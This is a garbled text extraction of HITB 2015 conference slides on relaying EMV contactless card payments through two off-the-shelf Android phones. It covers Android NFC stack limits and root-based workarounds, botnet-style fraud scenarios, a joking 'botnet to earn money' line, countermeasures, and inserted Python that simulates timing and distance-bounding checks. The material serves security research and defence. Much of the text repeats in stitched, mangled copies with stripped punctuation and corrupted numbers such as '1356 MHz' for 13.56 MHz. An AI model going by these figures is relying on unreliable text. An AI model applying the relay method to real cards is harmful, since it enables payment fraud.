Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36


Conclusions (II): But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work: Develop a botnet infrastructure and earn money

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

Acknowledgments: Spanish National Cybersecurity Institute (INCIBE)

University of León under contract X43

HITB staff

And thanks to all for hearing us

Visit http://vwzq.net/relaynfc for more info about the project


Android and NFC: A Tale of L♥ve (III) – Digging into Android NFC stack: Reader/Writer mode

Not allowed to be set directly → Android activity

The Android NFC service selects apps according to the tag definition in the Manifest file. At low level, libnfc-nci uses a reliable mechanism of queues and message passing – General Kernel Interface (GKI)

Makes communication between layers and modules easier

[Diagram: call path from User App to Tag. NFC developer framework: NfcService → mTagService.transceive → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI doTransceive. System NFC Library: NativeNfcTag.cpp → libnfc-nci]

Android and NFC: A Tale of L♥ve (IV) – Digging into Android NFC stack: HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu method. AID-based routing service table

This means you need to declare in advance what AID you handle

Android and NFC: A Tale of L♥ve (V) – Digging into Android NFC stack: Summary

Description                                         Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)   Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)       C/C++         Manufacturer                Yes
NFC Android kernel driver                           C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)    ARM Thumb     Hardware and manufacturer   No

Some useful links:

https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc

https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc

https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci

https://android.googlesource.com/platform/external/libnfc-nci/+/master/src

http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications

http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf

http://www.datasheet4u.com/PDF/845670/BCM20793S.html

http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI) – Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic. libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome if the NFCC is modified

EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: Dishonest prover communicates with an honest verifier. Device in HCE mode

AID must be known in advance

Overcome if the device is rooted

Xposed framework may help to overcome this issue, but needs root permissions


Android and NFC: A Tale of L♥ve (V) – Some remarkable limitations and remarks

Limitation 3: Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel. ISO/IEC 14443-4 defines the Frame Waiting Time as

$FWT = 256 \cdot (16 / f_c) \cdot 2^{FWI}$, $0 \le FWI \le 14$, where $f_c = 13.56$ MHz

FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s

Concluding Remarks: Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed

Any communication involving an APDU-compliant NFC tag (i.e., MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice


Relay Attack Implementation (I) – Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support

Android app developed (±2000 LOC). Two OTS Android NFC-capable devices

One constraint: only the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II) – Threat Scenarios: Scenario 1

Distributed Mafia Fraud

[Diagram: a BOTMASTER coordinating several BOTs]

Relay Attack Implementation (III) – Threat Scenarios: Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV) – Resistant Mechanisms

Brief summary of resistant mechanisms

Distance-bounding protocols: upper-bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages

Timing constraints: not enforced in current NFC-capable systems. The protocol itself allows timing extension commands

Physical countermeasures: whitelisting/blacklisting (random UID in HCE mode → unfeasible), RFID blocking covers, physical button/switch activation, secondary authentication methods (e.g., on-card fingerprint scanners)
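The FWT formula from Limitation 3 and the "timing constraints" countermeasure above, worked through as an added Python example (not code from the talk or from its Android app): it computes FWT for each FWI, models the S(WTX) extension the protocol allows, and shows why a verifier that enforces only FWT accepts a relayed session while a tighter policy bound that refuses extensions rejects it. The APDU labels and round-trip times in the traces are constructed for illustration, not measurements from the experiment.

```python
"""ISO/IEC 14443-4 Frame Waiting Time arithmetic and a verifier-side timing
check, as an illustration of the slide's point that FWT alone does not stop
a relay.  Added example; not the talk's code."""

from dataclasses import dataclass
from typing import List, Optional, Tuple

FC_HZ = 13.56e6   # ISO/IEC 14443 carrier frequency f_c
FWI_MAX = 14      # Frame Waiting Integer: 0..14 are the valid codings
WTXM_MAX = 59     # multiplier carried in an S(WTX) request: 1..59


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / f_c) * 2**FWI.  FWI=0 gives ~302 us, FWI=14 ~4.95 s."""
    if not 0 <= fwi <= FWI_MAX:
        raise ValueError(f"FWI must be in 0..{FWI_MAX}, got {fwi}")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwt_with_wtx(fwi: int, wtxm: int) -> float:
    """Temporary FWT granted by an S(WTX) request with multiplier WTXM.

    This is the 'timing extension command' the slide mentions: the card side
    (or a relaying HCE device) asks the reader to wait WTXM times longer.
    The result is capped at FWT(FWI_MAX), the protocol maximum."""
    if not 1 <= wtxm <= WTXM_MAX:
        raise ValueError(f"WTXM must be in 1..{WTXM_MAX}, got {wtxm}")
    return min(fwt_seconds(fwi) * wtxm, fwt_seconds(FWI_MAX))


@dataclass
class Exchange:
    apdu: str                    # label of the command (constructed)
    rtt_s: float                 # measured command/response round-trip time
    wtx_requested: bool = False  # did the card side send an S(WTX)?


def check_session(exchanges: List[Exchange], fwi: int,
                  policy_bound_s: Optional[float] = None,
                  allow_wtx: bool = True) -> Tuple[bool, List[str]]:
    """Return (accepted, reasons).

    With only the protocol rules (policy_bound_s=None, allow_wtx=True) any
    reply inside FWT, up to ~5 s, is accepted.  A policy bound well below FWT
    plus refusing S(WTX) is the 'timing constraints' countermeasure."""
    reasons = []
    for ex in exchanges:
        limit = fwt_seconds(fwi)
        if ex.wtx_requested:
            if not allow_wtx:
                reasons.append(f"{ex.apdu}: S(WTX) requested but extensions are refused")
                continue
            limit = fwt_with_wtx(fwi, WTXM_MAX)   # worst case the card may ask for
        if ex.rtt_s > limit:
            reasons.append(f"{ex.apdu}: {ex.rtt_s * 1e3:.0f} ms exceeds FWT {limit * 1e3:.0f} ms")
        elif policy_bound_s is not None and ex.rtt_s > policy_bound_s:
            reasons.append(f"{ex.apdu}: {ex.rtt_s * 1e3:.0f} ms exceeds policy bound "
                           f"{policy_bound_s * 1e3:.0f} ms")
    return (not reasons, reasons)


# Constructed traces: a card answering directly, and the same command sequence
# answered through a phone-to-phone relay (hundreds of ms of added latency).
GENUINE_CARD = [Exchange("SELECT PPSE", 0.018), Exchange("SELECT AID", 0.021),
                Exchange("GET PROCESSING OPTIONS", 0.045), Exchange("READ RECORD", 0.030)]
RELAYED = [Exchange("SELECT PPSE", 0.310), Exchange("SELECT AID", 0.420),
           Exchange("GET PROCESSING OPTIONS", 0.650), Exchange("READ RECORD", 0.480)]


def demo() -> None:
    print("FWI  FWT")
    for fwi in (0, 4, 8, 14):
        print(f"{fwi:>3}  {fwt_seconds(fwi) * 1e3:9.3f} ms")
    for name, trace in (("genuine", GENUINE_CARD), ("relayed", RELAYED)):
        proto_ok, _ = check_session(trace, fwi=FWI_MAX)
        pol_ok, why = check_session(trace, fwi=FWI_MAX, policy_bound_s=0.100, allow_wtx=False)
        print(f"{name}: FWT only -> {'accept' if proto_ok else 'reject'}; "
              f"100 ms bound, no WTX -> {'accept' if pol_ok else 'reject'}")
        for r in why:
            print("   ", r)


if __name__ == "__main__":
    demo()
```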



Android and NFC: A Tale of L♥ve (V)
Digging into Android NFC stack – Summary

Description                           Language(s)   Dependency                  OSS
NFC developer framework               Java, C++     API level                   Yes
  (com.android.nfc package)
System NFC library                    C/C++         Manufacturer                Yes
  (libnfc-nxp or libnfc-nci)
NFC Android kernel driver             C             Hardware and manufacturer   Yes
NFC firmware                          ARM Thumb     Hardware and manufacturer   No
  (/system/vendor/firmware directory)

Some useful links:

https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc

https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc

https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci

https://android.googlesource.com/platform/external/libnfc-nci/+/master/src

http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications

http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf

http://www.datasheet4u.com/PDF/845670/BCM20793S.html

http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI)
Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic
  • libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
  • Caused by the CRC computation performed by the NFCC
  • Overcome if the NFCC is modified
  • EMV contactless cards are IsoDep (fully ISO/IEC 14443-compliant)

Limitation 2: Dishonest prover communicates with an honest verifier (device in HCE mode)
  • AID must be known in advance
  • Overcome if the device is rooted
  • The Xposed framework may help to overcome this issue, but needs root permissions


Android and NFC: A Tale of L♥ve (V)
Some remarkable limitations and remarks

Limitation 3: Dishonest prover and a dishonest verifier communicate through a non-reliable peer-to-peer relay channel
  • ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16/fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
  • FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s

Concluding Remarks
  • Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
  • Any communication involving an APDU-compliant NFC tag (i.e. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now let's move to the practice!


Agenda

1 Introduction

2 Background
  EMV Contactless Cards
  Relay Attacks and Mafia Frauds

3 Android and NFC: A Tale of L♥ve
  Evolution of NFC Support in Android
  Practical Implementation Alternatives in Android

4 Relay Attack Implementation
  Demo experiment
  Threat Scenarios
  Resistant Mechanisms

5 Related Work

6 Conclusions

Relay Attack Implementation (I)
Experiment configuration

  • PoS device: Ingenico IWL280 with GPRS + NFC support
  • Android app developed (±2000 LOC)
  • Two OTS Android NFC-capable devices
  • One constraint only: the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II)
Threat Scenarios – Scenario 1: Distributed Mafia Fraud

(Figure: a BOTMASTER node connected to several BOT nodes)

Relay Attack Implementation (III)
Threat Scenarios – Scenario 2: Hiding Fraud Locations

Relay Attack Implementation (IV)
Resistant Mechanisms

Brief summary of resistant mechanisms
  • Distance-bounding protocols: upper-bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
  • Timing constraints: not enforced in current NFC-capable systems; the protocol itself allows timing extension commands
  • Physical countermeasures:
      Whitelisting/blacklisting (random UID in HCE mode → unfeasible)
      RFID blocking covers
      Physical button/switch activation
      Secondary authentication methods (e.g. on-card fingerprint scanners)
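The FWT formula from Limitation 3 and the two timing-based mechanisms listed above (the protocol's own Frame Waiting Time, which a prover may stretch with a waiting time extension, versus a distance bound on challenge-response round trips), worked through as an added example. This is not code from the original slides or from the authors' app: the provers are simulated and report how long they would take to answer rather than being timed on hardware, and the key and the 200 ms relay latency are constructed values.

```python
"""Why Frame Waiting Time does not stop a relay, while a distance bound does.

Added example, not code from the original slides. Clocks are simulated (each
prover reports its own delay), so the run is deterministic and needs no NFC
hardware.
"""
from __future__ import annotations

import hashlib
import hmac
import os
from dataclasses import dataclass

FC_HZ = 13.56e6   # ISO/IEC 14443 carrier frequency fc
WTXM_MAX = 59     # largest waiting-time-extension multiplier ISO/IEC 14443-4 allows


def frame_waiting_time(fwi: int) -> float:
    """FWT in seconds: 256 * (16 / fc) * 2^FWI with 0 <= FWI <= 14 (ISO/IEC 14443-4)."""
    if not 0 <= fwi <= 14:
        raise ValueError("FWI must be in [0, 14]")
    return 256 * (16 / FC_HZ) * 2 ** fwi


@dataclass
class SimulatedProver:
    """A card, or something answering on its behalf, as seen from the verifier."""
    key: bytes
    processing_s: float        # time the genuine card needs to compute its answer
    relay_rtt_s: float = 0.0   # extra round trip added by a relay channel; 0 = card is present

    def answer(self, challenge: bytes) -> tuple[bytes, float]:
        # A passive relay forwards the genuine card's answer, so the response is
        # always cryptographically correct; only the elapsed time betrays the relay.
        response = hmac.new(self.key, challenge, hashlib.sha256).digest()
        return response, self.processing_s + self.relay_rtt_s


def challenge_response_rounds(prover: SimulatedProver, key: bytes, rounds: int = 8,
                              rng=os.urandom) -> tuple[bool, float]:
    """Run `rounds` fresh challenges; return (all answers correct, slowest round trip in s)."""
    slowest = 0.0
    for _ in range(rounds):
        challenge = rng(16)
        response, elapsed = prover.answer(challenge)
        expected = hmac.new(key, challenge, hashlib.sha256).digest()
        if not hmac.compare_digest(response, expected):
            return False, slowest
        slowest = max(slowest, elapsed)
    return True, slowest


def accepts_under_fwt(prover: SimulatedProver, key: bytes, fwi: int, wtxm: int = 1) -> bool:
    """Verifier that only enforces the protocol's FWT, optionally extended by S(WTX) x WTXM."""
    if not 1 <= wtxm <= WTXM_MAX:
        raise ValueError("WTXM must be in [1, 59]")
    correct, slowest = challenge_response_rounds(prover, key)
    return correct and slowest <= frame_waiting_time(fwi) * wtxm


def accepts_under_distance_bound(prover: SimulatedProver, key: bytes, bound_s: float) -> bool:
    """Verifier that upper-bounds physical distance by the round trip of every challenge."""
    correct, slowest = challenge_response_rounds(prover, key)
    return correct and slowest <= bound_s


def demo() -> dict:
    key = b"constructed-card-key"  # constructed sample key, not taken from any real card
    genuine = SimulatedProver(key, processing_s=1e-6)                   # card on the reader
    relayed = SimulatedProver(key, processing_s=1e-6, relay_rtt_s=0.2)  # 200 ms via a phone pair
    return {
        "fwt_min_s": frame_waiting_time(0),    # about 302 us
        "fwt_max_s": frame_waiting_time(14),   # about 4.95 s
        "genuine_fwt8": accepts_under_fwt(genuine, key, fwi=8),
        "relayed_fwt8": accepts_under_fwt(relayed, key, fwi=8),             # 77 ms: relay too slow
        "relayed_fwt8_wtx": accepts_under_fwt(relayed, key, fwi=8, wtxm=4),  # asks for 4x: accepted
        "relayed_fwt14": accepts_under_fwt(relayed, key, fwi=14),           # 4.95 s: accepted
        "genuine_db": accepts_under_distance_bound(genuine, key, 5e-6),
        "relayed_db": accepts_under_distance_bound(relayed, key, 5e-6),     # 5 us bound: rejected
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point the results make is the one the slide states: a relay that stays under FWT, or simply asks for an extension, passes every check the protocol itself performs, and only a tight per-challenge round-trip bound detects it.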


Related Work
On relay attacks

  • 2005–2009: First works built on specific hardware
  • 2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
  • 2012–2013: Relay attacks on Android accessing Secure Elements
      A SE securely stores data associated with credit/debit cards
      Needs a non-OTS Android device
  • 2014: Active relay attacks with custom hardware and custom Android firmware
  • Several works studied the delay over the relay channel
      Relay over long distances is feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide


Conclusions (I)

  • Security of NFC relies on physical proximity
  • NFC threats: eavesdropping, data modification, relay attacks
  • Android NFC-capable devices are rising: they can be abused to interact with cards in their proximity

Conclusions
  • Review of the Android NFC stack
  • Proof-of-Concept of relay attacks using Android OTS devices
  • Threat scenarios introduced
  • Virtual pickpocketing attacks may appear before long


Conclusions (II)

But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work
  • Develop a botnet infrastructure and earn money (struck out on the slide)
  • Timing constraints of Android HCE mode
  • Try active relay attacks within EMV contactless cards

Acknowledgments
  • Spanish National Cybersecurity Institute (INCIBE)
  • University of León under contract X43
  • HITB staff

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 34: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

